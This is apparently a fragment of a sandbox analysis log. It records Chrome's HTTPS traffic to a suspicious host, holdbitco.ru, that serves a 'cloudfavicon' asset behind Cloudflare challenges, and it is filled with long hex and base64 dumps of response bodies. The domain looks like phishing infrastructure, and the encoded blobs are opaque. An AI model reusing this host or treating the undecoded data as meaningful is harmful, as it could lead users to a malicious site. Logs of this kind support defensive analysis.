54 53 35 62 66 70 35 4b 75 32 75 4e 6e 68 79 71 6e 65 77 38 36 74 34 73 66 53 79 65 72 50 73 38 76 49 39 75 71 38 38 72 76 6a 30 67 62 6e 32 4d 48 31 33 39
                                                                                                                                                                                                                                                                                                              Data Ascii: EDj0qGhxSQCRGNzJXWSguXjQvOhlOMz4dUjRAOUIrSjtsJl0+PHJgRU4uSDFTRFdMflxTTTlDb09QhVlBdltmRXpcZ0l+Y25NgmdyUYZrdlVnb1einnB1XZJ3gmGWe4Zlh3ybenyqgoSmtqK5e4iXib2Iq5GbpJKTwbmigbabpoW6n6qhwqeLo6DOwpTJuMemyc26nN23r+TS5bfp5Ku2uNnhyqnew86t4sfSyerPs8vI9uq88rvj0gbn2MH139
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1364INData Raw: 4c 67 31 43 4a 7a 49 52 52 69 73 32 46 55 6f 76 4e 69 74 51 47 6a 67 64 55 6a 64 43 49 56 59 37 52 69 56 61 50 30 6f 70 58 6b 4e 4f 4c 57 45 76 52 6b 64 6c 64 6b 70 48 56 31 78 4f 4f 56 74 44 58 46 47 46 50 6c 35 45 55 32 68 71 6a 6b 39 66 61 6b 6c 2b 59 32 35 4e 67 6d 64 79 55 59 56 57 68 32 65 4d 56 6e 52 5a 6a 6e 4e 2b 58 5a 4a 33 67 6d 47 57 65 34 61 76 6d 71 35 2b 66 62 4b 79 6b 6f 43 78 74 5a 4a 78 70 6f 75 57 64 61 6c 36 71 34 75 63 6c 4a 79 56 6f 4c 47 63 67 62 61 62 70 6f 57 36 6e 36 61 66 72 4d 71 67 6a 62 44 4f 74 74 76 56 6d 36 61 55 6e 72 65 34 34 75 48 41 73 71 2b 2f 78 4c 61 68 77 37 69 32 74 73 65 2f 79 72 76 4c 30 4d 4b 2f 34 73 54 47 77 39 50 59 79 67 44 71 2f 74 37 51 38 64 76 59 76 66 4c 58 34 73 48 32 32 2b 4c 62 36 41 66 63 79 65 77
                                                                                                                                                                                                                                                                                                              Data Ascii: Lg1CJzIRRis2FUovNitQGjgdUjdCIVY7RiVaP0opXkNOLWEvRkdldkpHV1xOOVtDXFGFPl5EU2hqjk9fakl+Y25NgmdyUYVWh2eMVnRZjnN+XZJ3gmGWe4avmq5+fbKykoCxtZJxpouWdal6q4uclJyVoLGcgbabpoW6n6afrMqgjbDOttvVm6aUnre44uHAsq+/xLahw7i2tse/yrvL0MK/4sTGw9PYygDq/t7Q8dvYvfLX4sH22+Lb6Afcyew
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1365INData Raw: 53 5a 48 47 7a 31 55 55 6d 4e 51 47 31 78 65 55 43 5a 6e 61 6c 52 6e 61 47 4a 73 4f 79 6b 2f 59 32 70 42 53 47 5a 71 61 44 56 48 52 6d 67 39 58 58 52 79 67 33 41 37 66 58 35 77 52 6f 65 4b 59 31 78 66 57 47 56 73 54 34 5a 46 55 55 39 6e 6b 47 6c 58 57 4a 5a 73 66 49 2b 53 63 6f 6d 67 6b 34 78 58 6b 35 35 35 69 6f 53 6b 6c 35 6c 36 6f 59 71 61 66 36 36 78 6e 33 43 6d 6b 4a 57 33 73 4a 6c 30 6c 62 79 50 65 4a 6e 41 77 58 79 64 78 4d 6d 41 6f 63 69 47 68 4b 58 4d 76 59 69 70 30 4d 57 4d 72 64 54 4e 6b 4c 48 59 31 5a 53 31 32 62 65 59 75 64 32 2f 6e 4c 33 68 78 36 44 42 35 64 57 6b 78 65 71 71 71 4d 6e 75 73 71 7a 4e 38 75 32 77 30 65 76 54 74 4e 58 76 32 37 6a 5a 38 2b 50 43 31 74 72 33 78 2f 4d 4a 34 77 7a 5a 2f 4d 76 6d 38 2b 72 77 46 77 6e 53 31 4e 62 6d
                                                                                                                                                                                                                                                                                                              Data Ascii: SZHGz1UUmNQG1xeUCZnalRnaGJsOyk/Y2pBSGZqaDVHRmg9XXRyg3A7fX5wRoeKY1xfWGVsT4ZFUU9nkGlXWJZsfI+Scomgk4xXk555ioSkl5l6oYqaf66xn3CmkJW3sJl0lbyPeJnAwXydxMmAociGhKXMvYip0MWMrdTNkLHY1ZS12beYud2/nL3hx6DB5dWkxeqqqMnusqzN8u2w0evTtNXv27jZ8+PC1tr3x/MJ4wzZ/Mvm8+rwFwnS1Nbm
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1366INData Raw: 42 45 52 56 59 63 51 6c 39 42 53 55 78 55 56 6d 42 41 63 45 35 6c 61 6c 4a 79 61 30 68 57 53 33 42 4d 64 45 78 78 63 31 63 7a 57 48 5a 4e 63 48 70 44 63 46 70 35 64 49 42 33 66 48 64 64 52 34 64 6a 63 6e 2b 49 61 4a 69 45 65 6b 31 30 57 6e 70 72 61 6d 79 57 6d 57 36 4e 6c 32 4f 67 6c 4a 36 68 69 6e 2b 4e 70 58 70 2b 70 4b 6d 53 6b 35 5a 70 6a 48 61 57 68 34 71 46 73 49 35 79 71 37 65 6b 66 62 6d 30 71 4b 61 6a 75 61 79 30 6a 63 44 46 72 71 2f 47 6a 35 36 6e 74 6f 33 53 6c 72 61 6e 74 73 6a 54 73 4e 79 39 77 64 71 32 7a 74 72 65 70 63 50 5a 7a 4f 54 58 34 71 65 74 7a 4e 2b 76 78 75 48 70 38 4f 33 4a 7a 62 6e 4e 38 4c 43 34 76 4f 7a 79 34 66 33 31 31 65 4c 43 2f 50 37 34 43 75 41 49 33 41 63 51 35 78 48 4f 7a 73 6a 4e 38 77 33 4d 42 67 2f 50 46 4e 59 51 47
                                                                                                                                                                                                                                                                                                              Data Ascii: BERVYcQl9BSUxUVmBAcE5lalJya0hWS3BMdExxc1czWHZNcHpDcFp5dIB3fHddR4djcn+IaJiEek10WnpramyWmW6Nl2OglJ6hin+NpXp+pKmSk5ZpjHaWh4qFsI5yq7ekfbm0qKajuay0jcDFrq/Gj56nto3SlrantsjTsNy9wdq2ztrepcPZzOTX4qetzN+vxuHp8O3JzbnN8LC4vOzy4f311eLC/P74CuAI3AcQ5xHOzsjN8w3MBg/PFNYQG
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1371INData Raw: 37 79 73 33 54 6c 64 65 67 7a 4b 7a 4d 6b 35 62 63 6c 72 71 65 6d 62 6a 65 77 72 54 56 73 4c 4b 35 78 4c 79 2f 37 61 2b 38 32 73 47 38 37 74 50 57 77 4e 48 34 74 63 58 54 30 39 54 79 79 65 48 78 35 4e 62 63 41 2f 34 46 35 76 30 43 41 50 34 4f 32 67 6a 70 37 67 66 51 33 39 48 67 38 52 6e 56 38 52 48 55 38 39 2f 71 33 77 4d 62 48 69 54 6d 38 65 66 6f 41 41 59 6a 2f 67 59 6c 48 41 41 4a 37 41 38 65 39 51 38 72 4f 67 73 57 43 66 59 56 51 52 30 61 47 52 38 37 42 68 77 6e 51 6a 30 49 4a 45 6f 34 44 67 70 4d 54 6b 64 52 49 42 51 72 49 31 63 59 4c 44 63 39 48 44 41 34 4f 52 38 35 5a 55 45 6c 4f 44 42 62 49 6c 64 49 5a 6d 41 2f 59 30 63 2b 58 32 4d 39 58 6a 49 71 57 48 45 33 4d 6c 42 2b 66 56 52 55 50 6a 74 30 58 46 78 64 65 31 4a 69 52 49 42 35 65 33 39 49 66 45
                                                                                                                                                                                                                                                                                                              Data Ascii: 7ys3TldegzKzMk5bclrqembjewrTVsLK5xLy/7a+82sG87tPWwNH4tcXT09TyyeHx5NbcA/4F5v0CAP4O2gjp7gfQ39Hg8RnV8RHU89/q3wMbHiTm8efoAAYj/gYlHAAJ7A8e9Q8rOgsWCfYVQR0aGR87BhwnQj0IJEo4DgpMTkdRIBQrI1cYLDc9HDA4OR85ZUElODBbIldIZmA/Y0c+X2M9XjIqWHE3MlB+fVRUPjt0XFxde1JiRIB5e39IfE
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1375INData Raw: 51 45 41 44 47 42 59 64 4a 53 56 46 53 67 73 4c 51 53 45 79 51 43 77 76 46 54 34 31 45 44 4a 52 57 43 64 4b 4d 46 73 5a 55 55 6f 69 4f 30 39 56 4e 6d 6c 6e 58 55 49 32 53 57 59 2f 53 31 46 44 53 6d 67 31 53 6b 30 78 65 57 49 36 55 32 74 78 56 6b 68 4a 64 56 4b 46 65 30 52 63 55 48 74 46 64 57 68 37 54 48 43 48 69 70 42 54 58 31 32 57 62 6e 4e 54 5a 58 61 56 6c 6e 5a 58 6b 47 6c 76 57 61 4f 62 6a 33 52 79 6e 57 6d 41 61 36 56 73 6b 4a 47 71 73 48 4f 30 67 61 4f 4f 67 70 56 35 6a 4a 61 7a 72 5a 53 75 73 33 53 73 65 35 47 45 73 4a 6e 43 79 49 47 38 71 59 32 65 71 38 2f 51 70 38 57 4d 6a 35 2b 69 74 63 65 78 7a 64 65 56 71 62 75 2b 34 62 32 76 34 4e 6a 62 35 62 53 68 76 37 65 39 72 73 62 61 78 73 6a 76 37 38 44 57 79 2f 62 5a 34 38 66 45 32 65 62 4f 79 66 76
                                                                                                                                                                                                                                                                                                              Data Ascii: QEADGBYdJSVFSgsLQSEyQCwvFT41EDJRWCdKMFsZUUoiO09VNmlnXUI2SWY/S1FDSmg1Sk0xeWI6U2txVkhJdVKFe0RcUHtFdWh7THCHipBTX12WbnNTZXaVlnZXkGlvWaObj3RynWmAa6VskJGqsHO0gaOOgpV5jJazrZSus3Sse5GEsJnCyIG8qY2eq8/Qp8WMj5+itcexzdeVqbu+4b2v4Njb5bShv7e9rsbaxsjv78DWy/bZ48fE2ebOyfv
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1376INData Raw: 37 33 63 64 0d 0a 6f 47 6b 74 4d 52 6c 41 66 45 43 63 79 56 69 45 72 4e 42 73 61 4e 47 41 34 4d 6a 6b 79 4d 54 59 38 49 46 68 52 4b 55 4a 45 61 30 4a 67 4a 7a 46 77 4b 6a 45 79 4c 55 78 59 5a 30 4e 6f 4f 32 56 4d 66 6c 68 34 66 31 35 78 56 34 4a 41 63 48 46 4a 59 6e 5a 38 58 5a 43 4f 68 47 6c 64 63 49 31 6d 63 6e 68 71 63 5a 42 74 5a 33 52 59 57 59 6c 68 65 6c 2b 59 66 58 42 66 61 48 35 32 66 47 32 44 6e 58 69 6b 67 62 53 71 63 34 74 2f 71 6e 4b 6b 6c 36 35 37 6e 36 43 35 76 34 4b 4f 6a 4d 57 64 6f 6f 4b 55 70 63 54 46 70 59 62 41 7a 71 69 66 30 72 53 74 6e 37 48 4d 6d 61 2b 61 31 4a 75 2b 31 74 6e 66 6f 75 4f 77 30 72 32 78 78 4b 69 37 78 65 4c 63 77 39 33 69 6f 39 7a 6c 31 4c 50 57 37 76 48 33 72 4d 58 59 76 4d 62 4a 33 4f 37 59 39 50 36 38 30 4f 4c 41
                                                                                                                                                                                                                                                                                                              Data Ascii: 73cdoGktMRlAfECcyViErNBsaNGA4MjkyMTY8IFhRKUJEa0JgJzFwKjEyLUxYZ0NoO2VMflh4f15xV4JAcHFJYnZ8XZCOhGldcI1mcnhqcZBtZ3RYWYlhel+YfXBfaH52fG2DnXikgbSqc4t/qnKkl657n6C5v4KOjMWdooKUpcTFpYbAzqif0rStn7HMma+a1Ju+1tnfouOw0r2xxKi7xeLcw93io9zl1LPW7vH3rMXYvMbJ3O7Y9P680OLA
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1380INData Raw: 52 30 6d 6f 70 36 64 35 57 35 6a 49 36 64 6d 38 4b 63 75 70 47 6c 75 4a 32 61 77 63 57 61 7a 63 72 47 69 73 37 46 30 5a 62 57 70 4b 79 53 72 4a 69 35 72 37 54 61 75 74 54 58 75 62 4c 41 6f 63 6a 55 74 4f 6e 6e 76 4f 53 35 72 2b 7a 45 70 71 37 77 37 39 61 79 37 66 53 31 74 76 76 34 36 4c 2f 35 33 39 6e 62 41 77 50 54 35 39 6a 36 34 38 50 61 2f 73 76 76 38 41 6a 6c 44 67 58 50 47 4e 66 4d 31 4e 6b 47 33 66 62 30 46 50 67 56 41 52 6e 38 45 76 33 2b 47 42 51 6b 48 50 72 70 41 43 6b 44 38 75 2f 79 45 77 55 68 47 79 34 7a 4e 52 6f 7a 49 42 34 7a 52 44 48 37 50 67 49 52 48 6b 6b 49 4a 69 51 6a 4a 55 4d 61 4c 55 45 6b 4d 79 68 4d 4f 55 46 52 57 46 6c 57 4c 31 73 5a 47 6b 6f 69 4f 31 4e 56 50 6a 49 78 4a 7a 78 48 59 79 31 46 4c 30 5a 47 62 32 39 41 56 6b 4e 6d 4f
                                                                                                                                                                                                                                                                                                              Data Ascii: R0mop6d5W5jI6dm8KcupGluJ2awcWazcrGis7F0ZbWpKySrJi5r7TautTXubLAocjUtOnnvOS5r+zEpq7w79ay7fS1tvv46L/539nbAwPT59j648Pa/svv8AjlDgXPGNfM1NkG3fb0FPgVARn8Ev3+GBQkHPrpACkD8u/yEwUhGy4zNRozIB4zRDH7PgIRHkkIJiQjJUMaLUEkMyhMOUFRWFlWL1sZGkoiO1NVPjIxJzxHYy1FL0ZGb29AVkNmO
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1384INData Raw: 57 47 66 77 6c 2f 43 49 69 48 50 6f 4e 42 66 34 67 4c 42 6b 34 37 78 54 32 47 76 4d 78 4e 7a 30 4b 4d 53 55 57 2b 7a 6f 2f 52 52 63 45 51 43 5a 43 50 67 67 4e 45 44 34 7a 4c 42 51 33 4f 56 4a 59 47 6c 30 35 46 7a 4a 67 51 52 6c 68 47 79 49 6a 48 6a 31 45 53 44 64 42 54 55 73 71 4c 30 6b 76 54 30 42 78 55 57 78 4a 64 55 64 61 63 6b 64 6d 62 6a 78 69 55 56 74 67 64 56 35 38 57 55 4a 30 65 45 4e 35 57 33 78 4d 59 33 75 42 5a 47 4e 77 68 46 53 42 67 34 71 48 6c 49 2b 41 67 4a 69 4f 6a 31 36 43 70 35 79 58 6e 6f 75 47 6e 36 47 50 71 5a 69 66 67 59 70 73 6b 62 5a 2f 67 37 53 6a 65 61 75 30 76 4b 71 54 71 58 53 36 72 61 36 44 67 59 65 37 70 34 57 6a 79 70 69 5a 71 73 61 4b 71 70 36 6e 76 35 58 4e 72 74 69 53 30 4b 75 7a 6d 37 65 39 34 39 57 66 6f 61 4f 7a 73 64
                                                                                                                                                                                                                                                                                                              Data Ascii: WGfwl/CIiHPoNBf4gLBk47xT2GvMxNz0KMSUW+zo/RRcEQCZCPggNED4zLBQ3OVJYGl05FzJgQRlhGyIjHj1ESDdBTUsqL0kvT0BxUWxJdUdackdmbjxiUVtgdV58WUJ0eEN5W3xMY3uBZGNwhFSBg4qHlI+AgJiOj16Cp5yXnouGn6GPqZifgYpskbZ/g7Sjeau0vKqTqXS6ra6DgYe7p4WjypiZqsaKqp6nv5XNrtiS0Kuzm7e949WfoaOzsd
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1388INData Raw: 64 47 56 77 63 6e 52 73 57 34 47 69 59 6f 4a 6a 67 48 56 6a 5a 59 53 65 71 6d 6d 49 6f 36 71 42 70 72 43 70 63 70 43 56 6c 4c 46 30 6d 71 75 4f 69 6e 32 4a 66 35 31 37 6c 34 46 39 73 70 4f 48 67 6f 75 58 69 38 32 50 6d 34 2b 51 68 63 53 66 6b 63 4f 52 6c 39 75 61 71 64 37 50 71 72 36 38 6d 72 65 67 75 37 7a 54 31 37 48 49 70 64 66 57 31 36 66 45 30 4e 4f 77 33 62 50 79 39 2b 66 36 31 38 65 32 38 72 37 37 30 62 67 43 2b 41 44 32 2f 66 75 36 77 2f 58 56 42 39 66 34 7a 4f 34 46 43 68 45 53 42 77 49 43 41 51 2f 36 32 42 51 62 47 2b 30 57 36 69 51 61 42 64 63 61 48 4f 44 62 46 53 6b 75 2b 43 51 71 43 79 63 6b 4e 53 59 74 44 78 55 61 49 6a 73 30 4a 54 62 34 4f 7a 4d 6a 4e 45 55 79 2f 44 38 44 45 7a 56 4b 43 54 6c 43 44 69 55 52 48 42 45 38 4a 6b 39 56 43 6c 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: dGVwcnRsW4GiYoJjgHVjZYSeqmmIo6qBprCpcpCVlLF0mquOin2Jf517l4F9spOHgouXi82Pm4+QhcSfkcORl9uaqd7Pqr68mregu7zT17HIpdfW16fE0NOw3bPy9+f618e28r770bgC+AD2/fu6w/XVB9f4zO4FChESBwICAQ/62BQbG+0W6iQaBdcaHODbFSku+CQqCyckNSYtDxUaIjs0JTb4OzMjNEUy/D8DEzVKCTlCDiURHBE8Jk9VClo
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1392INData Raw: 4f 6e 6a 33 63 63 4f 39 2b 38 48 34 67 58 78 34 2b 50 4a 30 64 55 47 44 42 66 79 36 78 77 63 37 50 37 77 45 2f 6b 42 39 68 55 42 2b 68 2f 6c 42 51 4d 47 4a 50 6f 50 49 78 59 71 48 79 59 4c 4c 75 77 52 2b 77 6f 4a 43 69 38 2f 4e 68 73 4f 2f 54 4e 45 50 54 4d 4a 4a 6b 70 47 53 53 35 43 53 55 30 2f 42 31 59 66 4c 45 4d 6c 52 6b 51 31 54 68 74 58 58 78 6b 68 54 54 63 35 5a 53 51 6c 59 69 68 71 4a 43 56 4f 4b 7a 41 74 50 56 42 42 63 48 4a 68 5a 48 46 30 5a 48 4e 54 61 57 77 33 66 58 35 6a 5a 58 68 59 58 33 35 54 58 47 4a 47 52 33 64 50 61 49 42 79 59 57 39 56 56 6d 6c 30 6a 46 74 70 56 47 69 4b 58 33 2b 56 58 36 52 31 58 6f 43 58 68 48 69 58 5a 59 52 6d 69 48 2b 6b 6f 58 4f 43 5a 33 43 69 67 71 57 7a 71 34 75 75 65 4c 4f 30 76 73 47 54 6d 61 47 76 6d 63 69 6b
                                                                                                                                                                                                                                                                                                              Data Ascii: Onj3ccO9+8H4gXx4+PJ0dUGDBfy6xwc7P7wE/kB9hUB+h/lBQMGJPoPIxYqHyYLLuwR+woJCi8/NhsO/TNEPTMJJkpGSS5CSU0/B1YfLEMlRkQ1ThtXXxkhTTc5ZSQlYihqJCVOKzAtPVBBcHJhZHF0ZHNTaWw3fX5jZXhYX35TXGJGR3dPaIByYW9VVml0jFtpVGiKX3+VX6R1XoCXhHiXZYRmiH+koXOCZ3CigqWzq4uueLO0vsGTmaGvmcik
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1396INData Raw: 6f 30 61 54 74 59 66 48 31 53 56 7a 6d 42 65 31 68 77 65 31 56 49 65 56 75 43 59 59 6c 67 55 45 6c 51 63 47 4a 73 67 59 78 71 65 49 52 30 65 33 56 76 64 70 52 72 66 4a 53 63 6a 6d 39 6a 63 6d 61 72 61 6e 65 46 68 49 61 6b 65 35 47 70 6c 6e 4f 72 70 34 79 78 67 35 78 38 72 48 79 63 6a 6f 32 78 6b 37 71 5a 77 59 57 79 67 59 57 45 70 4a 62 51 79 70 75 36 75 37 79 4f 7a 72 69 32 6d 4d 79 4e 30 36 6a 4e 6b 61 71 78 31 39 75 65 35 4f 53 69 30 38 4b 34 76 4d 53 6b 70 71 2f 6f 79 2b 61 6c 73 38 6e 71 74 65 48 61 38 2f 6d 38 31 38 37 4b 7a 66 48 4f 38 74 6e 62 30 38 2f 39 39 74 63 44 2b 50 66 2b 35 4f 7a 78 37 68 4d 4b 45 51 6a 58 39 50 4c 57 2b 77 72 32 48 42 76 61 2b 52 67 63 33 78 58 68 35 2b 51 68 4a 4f 6f 48 2b 41 7a 39 4d 53 77 6c 35 53 45 44 38 43 6f 4a 4c
                                                                                                                                                                                                                                                                                                              Data Ascii: o0aTtYfH1SVzmBe1hwe1VIeVuCYYlgUElQcGJsgYxqeIR0e3VvdpRrfJScjm9jcmaraneFhIake5GplnOrp4yxg5x8rHycjo2xk7qZwYWygYWEpJbQypu6u7yOzri2mMyN06jNkaqx19ue5OSi08K4vMSkpq/oy+als8nqteHa8/m8187KzfHO8tnb08/99tcD+Pf+5Ozx7hMKEQjX9PLW+wr2HBva+Rgc3xXh5+QhJOoH+Az9MSwl5SED8CoJL
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1400INData Raw: 36 31 71 65 73 33 73 37 51 73 50 43 77 30 4d 4c 51 78 4f 7a 61 38 73 50 30 35 72 6d 35 2f 74 6e 53 31 63 36 33 34 73 62 58 35 73 66 49 37 51 73 4b 34 63 49 4b 45 76 76 71 43 68 62 52 31 75 6e 6c 36 66 54 79 31 68 66 71 37 64 30 5a 37 77 45 69 49 68 38 6e 38 78 51 45 47 65 6a 36 44 41 73 67 4a 54 59 6b 43 42 44 75 43 77 34 78 39 54 49 36 4f 43 2f 35 51 67 49 5a 4a 77 45 6f 2f 69 63 58 4f 43 73 63 51 54 6b 50 50 51 6f 6d 55 79 64 59 54 30 46 43 4d 6a 45 54 4f 46 4e 58 58 6c 38 75 4e 57 45 66 49 46 41 6f 51 55 64 44 50 45 6b 71 54 30 42 4e 64 47 74 4e 52 7a 46 33 59 56 6c 77 54 47 35 62 54 55 31 56 59 30 46 6b 4f 32 4e 54 64 47 64 5a 51 6e 56 4c 65 55 5a 68 54 6f 35 6a 67 47 79 43 66 34 42 50 5a 6f 6c 55 64 70 69 59 63 58 69 58 6b 6f 39 68 63 48 69 44 6d 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: 61qes3s7QsPCw0MLQxOza8sP05rm5/tnS1c634sbX5sfI7QsK4cIKEvvqChbR1unl6fTy1hfq7d0Z7wEiIh8n8xQEGej6DAsgJTYkCBDuCw4x9TI6OC/5QgIZJwEo/icXOCscQTkPPQomUydYT0FCMjETOFNXXl8uNWEfIFAoQUdDPEkqT0BNdGtNRzF3YVlwTG5bTU1VY0FkO2NTdGdZQnVLeUZhTo5jgGyCf4BPZolUdpiYcXiXko9hcHiDmo
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1405INData Raw: 4a 7a 49 35 56 56 6b 32 50 56 6c 4e 4f 6b 46 64 59 44 49 36 59 79 63 65 58 32 46 69 51 6d 77 71 4c 6b 35 4f 51 48 4e 31 5a 6b 49 2f 51 41 3d 3d 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: JzI5VVk2PVlNOkFdYDI6YyceX2FiQmwqLk5OQHN1ZkI/QA==
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1405INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              94192.168.2.1649814104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1405OUTGET /web5/assets/cloudfavicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              95192.168.2.1649815104.17.2.184443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1405OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1490923123:1698250217:y5wy3T9Zh5LE93RSXoIMvIzVSf_O0VV8iCypRe9eLoA/81bbd40e1eca59f1/c7b054a34972c39 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              96104.17.2.184443192.168.2.1649815C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1406INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:43 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                              cf-chl-out: kda/zFptkX75MuNuqXRExQ==$dWH6UXPib9GEi9146EsLmg==
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd419c999820c-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1406INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 7invalid
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1406INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              97104.21.0.95443192.168.2.1649814C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1406INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:43 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: image/x-icon
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 16 Aug 2023 15:22:46 GMT
                                                                                                                                                                                                                                                                                                              ETag: W/"86be-6030bde212b57"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MfjF1KsvZ1XI6sPiUUWyWQr46K%2BHkI9JT6s8pqoRQOuuAAbvyV3DlUSmuVxm7z6%2BL97Unu9IFCIl4mBVgtb%2FwrixoSYEF%2BZAWsqczqUlKnQ1fSfnRB13p48sYNxgclkCsT5sQFxMDPNwl6c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd4184e168251-IAD
